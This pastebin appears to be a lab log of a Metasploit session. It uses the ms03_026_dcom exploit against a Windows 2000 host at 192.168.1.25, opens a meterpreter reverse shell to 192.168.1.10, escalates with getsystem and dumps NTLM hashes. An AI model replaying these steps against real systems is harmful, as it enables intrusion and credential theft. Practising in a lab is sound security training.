Guest User

Untitled

a guest
Nov 26th, 2018
211
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 170.68 KB | None | 0 0
  1. ssmith@kali:~$ help
  2. GNU bash, version 4.4.23(1)-release (x86_64-pc-linux-gnu)
  3. These shell commands are defined internally. Type `help' to see this list.
  4. Type `help name' to find out more about the function `name'.
  5. Use `info bash' to find out more about the shell in general.
  6. Use `man -k' or `info' to find out more about commands not in this list.
  7.  
  8. A star (*) next to a name means that the command is disabled.
  9.  
  10. job_spec [&] history [-c] [-d offset] [n] or histor>
  11. (( expression )) if COMMANDS; then COMMANDS; [ elif COM>
  12. . filename [arguments] jobs [-lnprs] [jobspec ...] or jobs -x>
  13. : kill [-s sigspec | -n signum | -sigspe>
  14. [ arg... ] let arg [arg ...]
  15. [[ expression ]] local [option] name[=value] ...
  16. alias [-p] [name[=value] ... ] logout [n]
  17. bg [job_spec ...] mapfile [-d delim] [-n count] [-O orig>
  18. bind [-lpsvPSVX] [-m keymap] [-f filena> popd [-n] [+N | -N]
  19. break [n] printf [-v var] format [arguments]
  20. builtin [shell-builtin [arg ...]] pushd [-n] [+N | -N | dir]
  21. caller [expr] pwd [-LP]
  22. case WORD in [PATTERN [| PATTERN]...) C> read [-ers] [-a array] [-d delim] [-i >
  23. cd [-L|[-P [-e]] [-@]] [dir] readarray [-n count] [-O origin] [-s c>
  24. command [-pVv] command [arg ...] readonly [-aAf] [name[=value] ...] or >
  25. compgen [-abcdefgjksuv] [-o option] [-A> return [n]
  26. complete [-abcdefgjksuv] [-pr] [-DE] [-> select NAME [in WORDS ... ;] do COMMAN>
  27. compopt [-o|+o option] [-DE] [name ...> set [-abefhkmnptuvxBCHP] [-o option-na>
  28. continue [n] shift [n]
  29. coproc [NAME] command [redirections] shopt [-pqsu] [-o] [optname ...]
  30. declare [-aAfFgilnrtux] [-p] [name[=val> source filename [arguments]
  31. dirs [-clpv] [+N] [-N] suspend [-f]
  32. disown [-h] [-ar] [jobspec ... | pid ..> test [expr]
  33. echo [-neE] [arg ...] time [-p] pipeline
  34. enable [-a] [-dnps] [-f filename] [name> times
  35. eval [arg ...] trap [-lp] [[arg] signal_spec ...]
  36. exec [-cl] [-a name] [command [argument> true
  37. exit [n] type [-afptP] name [name ...]
  38. export [-fn] [name[=value] ...] or expo> typeset [-aAfFgilnrtux] [-p] name[=val>
  39. false ulimit [-SHabcdefiklmnpqrstuvxPT] [lim>
  40. fc [-e ename] [-lnr] [first] [last] or > umask [-p] [-S] [mode]
  41. fg [job_spec] unalias [-a] name [name ...]
  42. for NAME [in WORDS ... ] ; do COMMANDS;> unset [-f] [-v] [-n] [name ...]
  43. for (( exp1; exp2; exp3 )); do COMMANDS> until COMMANDS; do COMMANDS; done
  44. function name { COMMANDS ; } or name ()> variables - Names and meanings of some>
  45. getopts optstring name [arg] wait [-n] [id ...]
  46. hash [-lr] [-p pathname] [-dt] [name ..> while COMMANDS; do COMMANDS; done
  47. help [-dms] [pattern ...] { COMMANDS ; }
  48. ssmith@kali:~$ root
  49. bash: root: command not found
  50. ssmith@kali:~$ su -
  51. Password:
  52. su: Authentication failure
  53. ssmith@kali:~$ su -
  54. Password:
  55. su: Authentication failure
  56. ssmith@kali:~$ /usr/share/metasploit-framework/msfconsole
  57.  
  58.  
  59. Metasploit Park, System Security Interface
  60. Version 4.0.5, Alpha E
  61. Ready...
  62. > access security
  63. access: PERMISSION DENIED.
  64. > access security grid
  65. access: PERMISSION DENIED.
  66. > access main security grid
  67. access: PERMISSION DENIED....and...
  68. YOU DIDN'T SAY THE MAGIC WORD!
  69. YOU DIDN'T SAY THE MAGIC WORD!
  70. YOU DIDN'T SAY THE MAGIC WORD!
  71. YOU DIDN'T SAY THE MAGIC WORD!
  72. YOU DIDN'T SAY THE MAGIC WORD!
  73. YOU DIDN'T SAY THE MAGIC WORD!
  74. YOU DIDN'T SAY THE MAGIC WORD!
  75.  
  76.  
  77. =[ metasploit v4.17.3-dev ]
  78. + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
  79. + -- --=[ 538 payloads - 41 encoders - 10 nops ]
  80. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  81.  
  82. msf > Interrupt: use the 'exit' command to quit
  83. msf > exit
  84. ssmith@kali:~$ /usr/share/metasploit-framework/msfconsole
  85.  
  86.  
  87. ______________________________________________________________________________
  88. | |
  89. | METASPLOIT CYBER MISSILE COMMAND V4 |
  90. |______________________________________________________________________________|
  91. \ / /
  92. \ . / / x
  93. \ / /
  94. \ / + /
  95. \ + / /
  96. * / /
  97. / . /
  98. X / / X
  99. / ###
  100. / # % #
  101. / ###
  102. . /
  103. . / . * .
  104. /
  105. *
  106. + *
  107.  
  108. ^
  109. #### __ __ __ ####### __ __ __ ####
  110. #### / \ / \ / \ ########### / \ / \ / \ ####
  111. ################################################################################
  112. ################################################################################
  113. # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
  114. ################################################################################
  115. https://metasploit.com
  116.  
  117.  
  118. =[ metasploit v4.17.3-dev ]
  119. + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
  120. + -- --=[ 538 payloads - 41 encoders - 10 nops ]
  121. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  122.  
  123. msf > auxillary(snmp_login)
  124. [-] Unknown command: auxillary(snmp_login).
  125. msf > auxillary(snmp_login) > use auxillary/scanner/ftp/anonymous
  126. [-] Unknown command: auxillary(snmp_login).
  127. msf > auxillary($nmp_login) > use auxillary/scanner/ftp/anonymous
  128. [-] Unknown command: auxillary($nmp_login).
  129. msf > auxillary(anonymous) > show options
  130. [-] Unknown command: auxillary(anonymous).
  131. msf > help
  132.  
  133. Core Commands
  134. =============
  135.  
  136. Command Description
  137. ------- -----------
  138. ? Help menu
  139. banner Display an awesome metasploit banner
  140. cd Change the current working directory
  141. color Toggle color
  142. connect Communicate with a host
  143. exit Exit the console
  144. get Gets the value of a context-specific variable
  145. getg Gets the value of a global variable
  146. grep Grep the output of another command
  147. help Help menu
  148. history Show command history
  149. irb Drop into irb scripting mode
  150. load Load a framework plugin
  151. quit Exit the console
  152. route Route traffic through a session
  153. save Saves the active datastores
  154. sessions Dump session listings and display information about sessions
  155. set Sets a context-specific variable to a value
  156. setg Sets a global variable to a value
  157. sleep Do nothing for the specified number of seconds
  158. spool Write console output into a file as well the screen
  159. threads View and manipulate background threads
  160. unload Unload a framework plugin
  161. unset Unsets one or more context-specific variables
  162. unsetg Unsets one or more global variables
  163. version Show the framework and console library version numbers
  164.  
  165.  
  166. Module Commands
  167. ===============
  168.  
  169. Command Description
  170. ------- -----------
  171. advanced Displays advanced options for one or more modules
  172. back Move back from the current context
  173. info Displays information about one or more modules
  174. loadpath Searches for and loads modules from a path
  175. options Displays global options or for one or more modules
  176. popm Pops the latest module off the stack and makes it active
  177. previous Sets the previously loaded module as the current module
  178. pushm Pushes the active or list of modules onto the module stack
  179. reload_all Reloads all modules from all defined module paths
  180. search Searches module names and descriptions
  181. show Displays modules of a given type, or all modules
  182. use Selects a module by name
  183.  
  184.  
  185. Job Commands
  186. ============
  187.  
  188. Command Description
  189. ------- -----------
  190. handler Start a payload handler as job
  191. jobs Displays and manages jobs
  192. kill Kill a job
  193. rename_job Rename a job
  194.  
  195.  
  196. Resource Script Commands
  197. ========================
  198.  
  199. Command Description
  200. ------- -----------
  201. makerc Save commands entered since start to a file
  202. resource Run the commands stored in a file
  203.  
  204.  
  205. Developer Commands
  206. ==================
  207.  
  208. Command Description
  209. ------- -----------
  210. edit Edit the current module or a file with the preferred editor
  211. log Displays framework.log starting at the bottom if possible
  212. reload_lib Reload one or more library files from specified paths
  213.  
  214.  
  215. Database Backend Commands
  216. =========================
  217.  
  218. Command Description
  219. ------- -----------
  220. db_connect Connect to an existing database
  221. db_disconnect Disconnect from the current database instance
  222. db_export Export a file containing the contents of the database
  223. db_import Import a scan result file (filetype will be auto-detected)
  224. db_nmap Executes nmap and records the output automatically
  225. db_rebuild_cache Rebuilds the database-stored module cache
  226. db_status Show the current database status
  227. hosts List all hosts in the database
  228. loot List all loot in the database
  229. notes List all notes in the database
  230. services List all services in the database
  231. vulns List all vulnerabilities in the database
  232. workspace Switch between database workspaces
  233.  
  234.  
  235. Credentials Backend Commands
  236. ============================
  237.  
  238. Command Description
  239. ------- -----------
  240. creds List all credentials in the database
  241.  
  242. msf > services
  243. [-] Database not connected
  244. msf > hosts
  245. [-] Database not connected
  246. msf > connect 192.168.1.25
  247. Usage: connect [options] <host> <port>
  248.  
  249. Communicate with a host, similar to interacting via netcat, taking advantage of
  250. any configured session pivoting.
  251.  
  252. OPTIONS:
  253.  
  254. -C Try to use CRLF for EOL sequence.
  255. -P <opt> Specify source port.
  256. -S <opt> Specify source address.
  257. -c <opt> Specify which Comm to use.
  258. -h Help banner.
  259. -i <opt> Send the contents of a file.
  260. -p <opt> List of proxies to use.
  261. -s Connect with SSL.
  262. -u Switch to a UDP socket.
  263. -w <opt> Specify connect timeout.
  264. -z Just try to connect, then return.
  265. msf > connect 192.168.1.25 21
  266. [*] Connected to 192.168.1.25:21
  267. 220 server-1 Microsoft FTP Service (Version 5.0).
  268. ^Cmsf > connect -z 192.168.1.25 21
  269. [*] Connected to 192.168.1.25:21
  270. msf > use exploit/windows/browser/ms03_026dcom
  271. [-] Failed to load module: exploit/windows/browser/ms03_026dcom
  272. msf > use exploit/windows/browser/ms03_026_dcom
  273. [-] Failed to load module: exploit/windows/browser/ms03_026_dcom
  274. msf > use exploit/windows/dcerpc/ms03_026_dcom
  275. msf exploit(windows/dcerpc/ms03_026_dcom) > show targets
  276.  
  277. Exploit targets:
  278.  
  279. Id Name
  280. -- ----
  281. 0 Windows NT SP3-6a/2000/XP/2003 Universal
  282.  
  283.  
  284. msf exploit(windows/dcerpc/ms03_026_dcom) > set target 0
  285. target => 0
  286. msf exploit(windows/dcerpc/ms03_026_dcom) > show options
  287.  
  288. Module options (exploit/windows/dcerpc/ms03_026_dcom):
  289.  
  290. Name Current Setting Required Description
  291. ---- --------------- -------- -----------
  292. RHOST yes The target address
  293. RPORT 135 yes The target port (TCP)
  294.  
  295.  
  296. Exploit target:
  297.  
  298. Id Name
  299. -- ----
  300. 0 Windows NT SP3-6a/2000/XP/2003 Universal
  301.  
  302.  
  303. msf exploit(windows/dcerpc/ms03_026_dcom) > exploit
  304.  
  305. [-] Exploit failed: The following options failed to validate: RHOST.
  306. [*] Exploit completed, but no session was created.
  307. msf exploit(windows/dcerpc/ms03_026_dcom) > show options
  308.  
  309. Module options (exploit/windows/dcerpc/ms03_026_dcom):
  310.  
  311. Name Current Setting Required Description
  312. ---- --------------- -------- -----------
  313. RHOST yes The target address
  314. RPORT 135 yes The target port (TCP)
  315.  
  316.  
  317. Payload options (windows/meterpreter/reverse_tcp):
  318.  
  319. Name Current Setting Required Description
  320. ---- --------------- -------- -----------
  321. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
  322. LHOST 192.168.1.10 yes The listen address (an interface may be specified)
  323. LPORT 4444 yes The listen port
  324.  
  325.  
  326. Exploit target:
  327.  
  328. Id Name
  329. -- ----
  330. 0 Windows NT SP3-6a/2000/XP/2003 Universal
  331.  
  332.  
  333. msf exploit(windows/dcerpc/ms03_026_dcom) > set rhost 192.168.1.25
  334. rhost => 192.168.1.25
  335. msf exploit(windows/dcerpc/ms03_026_dcom) > exploit
  336.  
  337. [*] Started reverse TCP handler on 192.168.1.10:4444
  338. [*] 192.168.1.25:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
  339. [*] 192.168.1.25:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.25[135] ...
  340. [*] 192.168.1.25:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.25[135] ...
  341. [*] 192.168.1.25:135 - Sending exploit ...
  342. [*] Sending stage (179779 bytes) to 192.168.1.25
  343. [*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.25:1879) at 2018-11-26 01:55:30 -0500
  344.  
  345. meterpreter > help
  346.  
  347. Core Commands
  348. =============
  349.  
  350. Command Description
  351. ------- -----------
  352. ? Help menu
  353. background Backgrounds the current session
  354. bgkill Kills a background meterpreter script
  355. bglist Lists running background scripts
  356. bgrun Executes a meterpreter script as a background thread
  357. channel Displays information or control active channels
  358. close Closes a channel
  359. disable_unicode_encoding Disables encoding of unicode strings
  360. enable_unicode_encoding Enables encoding of unicode strings
  361. exit Terminate the meterpreter session
  362. get_timeouts Get the current session timeout values
  363. guid Get the session GUID
  364. help Help menu
  365. info Displays information about a Post module
  366. irb Drop into irb scripting mode
  367. load Load one or more meterpreter extensions
  368. machine_id Get the MSF ID of the machine attached to the session
  369. migrate Migrate the server to another process
  370. pivot Manage pivot listeners
  371. quit Terminate the meterpreter session
  372. read Reads data from a channel
  373. resource Run the commands stored in a file
  374. run Executes a meterpreter script or Post module
  375. sessions Quickly switch to another session
  376. set_timeouts Set the current session timeout values
  377. sleep Force Meterpreter to go quiet, then re-establish session.
  378. transport Change the current transport mechanism
  379. use Deprecated alias for "load"
  380. uuid Get the UUID for the current session
  381. write Writes data to a channel
  382.  
  383.  
  384. Stdapi: File system Commands
  385. ============================
  386.  
  387. Command Description
  388. ------- -----------
  389. cat Read the contents of a file to the screen
  390. cd Change directory
  391. checksum Retrieve the checksum of a file
  392. cp Copy source to destination
  393. dir List files (alias for ls)
  394. download Download a file or directory
  395. edit Edit a file
  396. getlwd Print local working directory
  397. getwd Print working directory
  398. lcd Change local working directory
  399. lls List local files
  400. lpwd Print local working directory
  401. ls List files
  402. mkdir Make directory
  403. mv Move source to destination
  404. pwd Print working directory
  405. rm Delete the specified file
  406. rmdir Remove directory
  407. search Search for files
  408. show_mount List all mount points/logical drives
  409. upload Upload a file or directory
  410.  
  411.  
  412. Stdapi: Networking Commands
  413. ===========================
  414.  
  415. Command Description
  416. ------- -----------
  417. arp Display the host ARP cache
  418. getproxy Display the current proxy configuration
  419. ifconfig Display interfaces
  420. ipconfig Display interfaces
  421. netstat Display the network connections
  422. portfwd Forward a local port to a remote service
  423. resolve Resolve a set of host names on the target
  424. route View and modify the routing table
  425.  
  426.  
  427. Stdapi: System Commands
  428. =======================
  429.  
  430. Command Description
  431. ------- -----------
  432. clearev Clear the event log
  433. drop_token Relinquishes any active impersonation token.
  434. execute Execute a command
  435. getenv Get one or more environment variable values
  436. getpid Get the current process identifier
  437. getprivs Attempt to enable all privileges available to the current process
  438. getsid Get the SID of the user that the server is running as
  439. getuid Get the user that the server is running as
  440. kill Terminate a process
  441. localtime Displays the target system's local date and time
  442. pgrep Filter processes by name
  443. pkill Terminate processes by name
  444. ps List running processes
  445. reboot Reboots the remote computer
  446. reg Modify and interact with the remote registry
  447. rev2self Calls RevertToSelf() on the remote machine
  448. shell Drop into a system command shell
  449. shutdown Shuts down the remote computer
  450. steal_token Attempts to steal an impersonation token from the target process
  451. suspend Suspends or resumes a list of processes
  452. sysinfo Gets information about the remote system, such as OS
  453.  
  454.  
  455. Stdapi: User interface Commands
  456. ===============================
  457.  
  458. Command Description
  459. ------- -----------
  460. enumdesktops List all accessible desktops and window stations
  461. getdesktop Get the current meterpreter desktop
  462. idletime Returns the number of seconds the remote user has been idle
  463. keyscan_dump Dump the keystroke buffer
  464. keyscan_start Start capturing keystrokes
  465. keyscan_stop Stop capturing keystrokes
  466. screenshot Grab a screenshot of the interactive desktop
  467. setdesktop Change the meterpreters current desktop
  468. uictl Control some of the user interface components
  469.  
  470.  
  471. Stdapi: Webcam Commands
  472. =======================
  473.  
  474. Command Description
  475. ------- -----------
  476. record_mic Record audio from the default microphone for X seconds
  477. webcam_chat Start a video chat
  478. webcam_list List webcams
  479. webcam_snap Take a snapshot from the specified webcam
  480. webcam_stream Play a video stream from the specified webcam
  481.  
  482.  
  483. Stdapi: Audio Output Commands
  484. =============================
  485.  
  486. Command Description
  487. ------- -----------
  488. play play an audio file on target system, nothing written on disk
  489.  
  490.  
  491. Priv: Elevate Commands
  492. ======================
  493.  
  494. Command Description
  495. ------- -----------
  496. getsystem Attempt to elevate your privilege to that of local system.
  497.  
  498.  
  499. Priv: Password database Commands
  500. ================================
  501.  
  502. Command Description
  503. ------- -----------
  504. hashdump Dumps the contents of the SAM database
  505.  
  506.  
  507. Priv: Timestomp Commands
  508. ========================
  509.  
  510. Command Description
  511. ------- -----------
  512. timestomp Manipulate file MACE attributes
  513.  
  514. meterpreter > getsystem
  515. ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
  516. meterpreter > hashdump
  517. Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  518. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  519. IUSR_SERVER-1:1001:41fb82b6d90015e21999569579263d0c:794369d7e8977c147248a190f0d79ce1:::
  520. IWAM_SERVER-1:1002:daf1d621e9c33b4515f6de9c1993944d:eaa3b3ed5b41fb47f026821ea0a9c458:::
  521. TsInternetUser:1000:23384a7478bce9ded16b348fefb241de:4a15316e51b56346157c7afac7b60bab:::
  522. meterpreter > webcam_list
  523. [-] No webcams were found
  524. meterpreter > ls
  525. Listing: C:\WINNT\system32
  526. ==========================
  527.  
  528. Mode Size Type Last modified Name
  529. ---- ---- ---- ------------- ----
  530. 100666/rw-rw-rw- 348 fil 2017-05-24 22:51:08 -0400 $winnt$.inf
  531. 100666/rw-rw-rw- 2151 fil 2002-12-31 07:00:00 -0500 12520437.cpx
  532. 100666/rw-rw-rw- 2233 fil 2002-12-31 07:00:00 -0500 12520850.cpx
  533. 100666/rw-rw-rw- 438 fil 2002-12-31 07:00:00 -0500 AUTOEXEC.NT
  534. 100666/rw-rw-rw- 2577 fil 2017-05-25 06:15:24 -0400 CONFIG.NT
  535. 100666/rw-rw-rw- 2577 fil 2002-12-31 07:00:00 -0500 CONFIG.TMP
  536. 40777/rwxrwxrwx 0 dir 2017-05-25 06:11:55 -0400 Cache
  537. 40777/rwxrwxrwx 0 dir 2017-05-24 22:51:10 -0400 CatRoot
  538. 100666/rw-rw-rw- 71952 fil 2002-12-31 07:00:00 -0500 Channel Screen Saver.scr
  539. 40777/rwxrwxrwx 0 dir 2017-05-25 06:12:40 -0400 Com
  540. 100666/rw-rw-rw- 147216 fil 2002-12-31 07:00:00 -0500 DComExt.dll
  541. 40777/rwxrwxrwx 0 dir 2017-05-25 06:11:44 -0400 DTCLog
  542. 100666/rw-rw-rw- 176400 fil 2002-12-31 07:00:00 -0500 EqnClass.Dll
  543. 100666/rw-rw-rw- 75968 fil 2017-05-25 06:24:57 -0400 FNTCACHE.DAT
  544. 40777/rwxrwxrwx 0 dir 2017-05-25 06:25:30 -0400 GroupPolicy
  545. 40777/rwxrwxrwx 0 dir 2017-05-25 06:25:05 -0400 LLS
  546. 40777/rwxrwxrwx 0 dir 2017-05-25 06:12:46 -0400 LogFiles
  547. 40777/rwxrwxrwx 0 dir 2017-05-25 06:11:52 -0400 Microsoft
  548. 40777/rwxrwxrwx 0 dir 2017-05-25 06:25:50 -0400 NtmsData
  549. 100666/rw-rw-rw- 470030 fil 2017-05-25 06:14:58 -0400 PerfStringBackup.INI
  550. 100666/rw-rw-rw- 81680 fil 2002-12-31 07:00:00 -0500 SPOOLSS.DLL
  551. 100777/rwxrwxrwx 45328 fil 2002-12-31 07:00:00 -0500 SPOOLSV.EXE
  552. 40777/rwxrwxrwx 0 dir 2017-05-24 22:49:48 -0400 Setup
  553. 40777/rwxrwxrwx 0 dir 2017-05-24 22:48:13 -0400 ShellExt
  554. 100666/rw-rw-rw- 75 fil 2002-12-31 07:00:00 -0500 View Channels.scf
  555. 100666/rw-rw-rw- 32016 fil 2002-12-31 07:00:00 -0500 aaaamon.dll
  556. 100666/rw-rw-rw- 67344 fil 2002-12-31 07:00:00 -0500 access.cpl
  557. 100666/rw-rw-rw- 59904 fil 2002-12-31 07:00:00 -0500 acctres.dll
  558. 100777/rwxrwxrwx 150800 fil 2002-12-31 07:00:00 -0500 accwiz.exe
  559. 100666/rw-rw-rw- 61952 fil 2002-12-31 07:00:00 -0500 acelpdec.ax
  560. 100666/rw-rw-rw- 131856 fil 2002-12-31 07:00:00 -0500 acledit.dll
  561. 100666/rw-rw-rw- 78096 fil 2002-12-31 07:00:00 -0500 aclui.dll
  562. 100666/rw-rw-rw- 4368 fil 2002-12-31 07:00:00 -0500 acsetupc.dll
  563. 100777/rwxrwxrwx 17168 fil 2002-12-31 07:00:00 -0500 acsetups.exe
  564. 100666/rw-rw-rw- 11536 fil 2002-12-31 07:00:00 -0500 acsmib.dll
  565. 100666/rw-rw-rw- 268048 fil 2002-12-31 07:00:00 -0500 acssnap.dll
  566. 100666/rw-rw-rw- 51200 fil 2002-12-31 07:00:00 -0500 acssnap.msc
  567. 100666/rw-rw-rw- 182032 fil 2002-12-31 07:00:00 -0500 activeds.dll
  568. 100666/rw-rw-rw- 107520 fil 2002-12-31 07:00:00 -0500 activeds.tlb
  569. 100777/rwxrwxrwx 26384 fil 2002-12-31 07:00:00 -0500 actmovie.exe
  570. 100666/rw-rw-rw- 72464 fil 2002-12-31 07:00:00 -0500 actxprxy.dll
  571. 100666/rw-rw-rw- 15208448 fil 2002-12-31 07:00:00 -0500 adminpak.msi
  572. 100666/rw-rw-rw- 39184 fil 2002-12-31 07:00:00 -0500 admparse.dll
  573. 100666/rw-rw-rw- 32528 fil 2002-12-31 07:00:00 -0500 admwprox.dll
  574. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 admxprox.dll
  575. 100666/rw-rw-rw- 27408 fil 2002-12-31 07:00:00 -0500 adptif.dll
  576. 100666/rw-rw-rw- 246544 fil 2002-12-31 07:00:00 -0500 adsiis.dll
  577. 100666/rw-rw-rw- 6416 fil 2003-06-19 22:44:54 -0400 adsiisex.dll
  578. 100666/rw-rw-rw- 125712 fil 2002-12-31 07:00:00 -0500 adsldp.dll
  579. 100666/rw-rw-rw- 133904 fil 2002-12-31 07:00:00 -0500 adsldpc.dll
  580. 100666/rw-rw-rw- 62736 fil 2002-12-31 07:00:00 -0500 adsmsext.dll
  581. 100666/rw-rw-rw- 164112 fil 2002-12-31 07:00:00 -0500 adsnds.dll
  582. 100666/rw-rw-rw- 201488 fil 2002-12-31 07:00:00 -0500 adsnt.dll
  583. 100666/rw-rw-rw- 112400 fil 2002-12-31 07:00:00 -0500 adsnw.dll
  584. 100666/rw-rw-rw- 387344 fil 2002-12-31 07:00:00 -0500 advapi32.dll
  585. 100666/rw-rw-rw- 88848 fil 2002-12-31 07:00:00 -0500 advpack.dll
  586. 100666/rw-rw-rw- 18192 fil 2002-12-31 07:00:00 -0500 alrsvc.dll
  587. 100666/rw-rw-rw- 16832 fil 2017-05-25 06:15:23 -0400 amcompat.tlb
  588. 100666/rw-rw-rw- 64784 fil 2002-12-31 07:00:00 -0500 amstream.dll
  589. 100666/rw-rw-rw- 9029 fil 2002-12-31 07:00:00 -0500 ansi.sys
  590. 100666/rw-rw-rw- 107792 fil 2002-12-31 07:00:00 -0500 apcups.dll
  591. 100777/rwxrwxrwx 12498 fil 2002-12-31 07:00:00 -0500 append.exe
  592. 100666/rw-rw-rw- 120592 fil 2002-12-31 07:00:00 -0500 appmgmts.dll
  593. 100666/rw-rw-rw- 224016 fil 2002-12-31 07:00:00 -0500 appmgr.dll
  594. 100666/rw-rw-rw- 301328 fil 2002-12-31 07:00:00 -0500 appwiz.cpl
  595. 100777/rwxrwxrwx 19728 fil 2002-12-31 07:00:00 -0500 arp.exe
  596. 100666/rw-rw-rw- 103184 fil 2002-12-31 07:00:00 -0500 asctrls.ocx
  597. 100666/rw-rw-rw- 14608 fil 2002-12-31 07:00:00 -0500 asfsipc.dll
  598. 100666/rw-rw-rw- 10000 fil 2002-12-31 07:00:00 -0500 aspperf.dll
  599. 100666/rw-rw-rw- 143632 fil 2002-12-31 07:00:00 -0500 asycfilt.dll
  600. 100777/rwxrwxrwx 23824 fil 2002-12-31 07:00:00 -0500 at.exe
  601. 100666/rw-rw-rw- 14096 fil 2002-12-31 07:00:00 -0500 atkctrs.dll
  602. 100666/rw-rw-rw- 74810 fil 2002-12-31 07:00:00 -0500 atl.dll
  603. 100777/rwxrwxrwx 11024 fil 2002-12-31 07:00:00 -0500 atmadm.exe
  604. 100666/rw-rw-rw- 291888 fil 2002-12-31 07:00:00 -0500 atmfd.dll
  605. 100666/rw-rw-rw- 31504 fil 2002-12-31 07:00:00 -0500 atmlib.dll
  606. 100777/rwxrwxrwx 12048 fil 2002-12-31 07:00:00 -0500 attrib.exe
  607. 100777/rwxrwxrwx 576272 fil 2002-12-31 07:00:00 -0500 autochk.exe
  608. 100777/rwxrwxrwx 589072 fil 2002-12-31 07:00:00 -0500 autoconv.exe
  609. 100777/rwxrwxrwx 568592 fil 2002-12-31 07:00:00 -0500 autofmt.exe
  610. 100777/rwxrwxrwx 8976 fil 2002-12-31 07:00:00 -0500 autolfn.exe
  611. 100666/rw-rw-rw- 69584 fil 2002-12-31 07:00:00 -0500 avicap.dll
  612. 100666/rw-rw-rw- 65808 fil 2002-12-31 07:00:00 -0500 avicap32.dll
  613. 100666/rw-rw-rw- 78608 fil 2002-12-31 07:00:00 -0500 avifil32.dll
  614. 100666/rw-rw-rw- 107984 fil 2002-12-31 07:00:00 -0500 avifile.dll
  615. 100666/rw-rw-rw- 17168 fil 2002-12-31 07:00:00 -0500 avmeter.dll
  616. 100666/rw-rw-rw- 226576 fil 2002-12-31 07:00:00 -0500 avtapi.dll
  617. 100666/rw-rw-rw- 76048 fil 2002-12-31 07:00:00 -0500 avwav.dll
  618. 100666/rw-rw-rw- 1927 fil 1998-03-20 20:14:34 -0500 axctrnm.h
  619. 100666/rw-rw-rw- 9584 fil 2002-12-31 07:00:00 -0500 axperf.ini
  620. 100666/rw-rw-rw- 1012 fil 2002-12-31 07:00:00 -0500 basenote.cov
  621. 100666/rw-rw-rw- 42256 fil 2002-12-31 07:00:00 -0500 basesrv.dll
  622. 100666/rw-rw-rw- 20752 fil 2002-12-31 07:00:00 -0500 batmeter.dll
  623. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 batt.dll
  624. 100666/rw-rw-rw- 94480 fil 2003-06-19 15:05:04 -0400 binlsvc.dll
  625. 100666/rw-rw-rw- 28420 fil 2002-12-31 07:00:00 -0500 bios1.rom
  626. 100666/rw-rw-rw- 8191 fil 2002-12-31 07:00:00 -0500 bios4.rom
  627. 100777/rwxrwxrwx 4880 fil 2002-12-31 07:00:00 -0500 bootok.exe
  628. 100666/rw-rw-rw- 10784 fil 2002-12-31 07:00:00 -0500 bootvid.dll
  629. 100777/rwxrwxrwx 5392 fil 2002-12-31 07:00:00 -0500 bootvrfy.exe
  630. 100666/rw-rw-rw- 22984 fil 2002-12-31 07:00:00 -0500 bopomofo.uce
  631. 100666/rw-rw-rw- 36112 fil 2002-12-31 07:00:00 -0500 br549.dll
  632. 100666/rw-rw-rw- 35328 fil 2002-12-31 07:00:00 -0500 browselc.dll
  633. 100666/rw-rw-rw- 68880 fil 2002-12-31 07:00:00 -0500 browser.dll
  634. 100666/rw-rw-rw- 808208 fil 2002-12-31 07:00:00 -0500 browseui.dll
  635. 100666/rw-rw-rw- 13584 fil 2002-12-31 07:00:00 -0500 btpagnt.dll
  636. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_037.nls
  637. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_10000.nls
  638. 100666/rw-rw-rw- 162850 fil 2002-12-31 07:00:00 -0500 c_10001.nls
  639. 100666/rw-rw-rw- 195618 fil 2002-12-31 07:00:00 -0500 c_10002.nls
  640. 100666/rw-rw-rw- 177698 fil 2002-12-31 07:00:00 -0500 c_10003.nls
  641. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_10004.nls
  642. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_10005.nls
  643. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_10006.nls
  644. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_10007.nls
  645. 100666/rw-rw-rw- 173602 fil 2002-12-31 07:00:00 -0500 c_10008.nls
  646. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_10010.nls
  647. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_10017.nls
  648. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_10021.nls
  649. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_10029.nls
  650. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_10079.nls
  651. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_10081.nls
  652. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_10082.nls
  653. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1026.nls
  654. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1047.nls
  655. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1140.nls
  656. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1141.nls
  657. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1142.nls
  658. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1143.nls
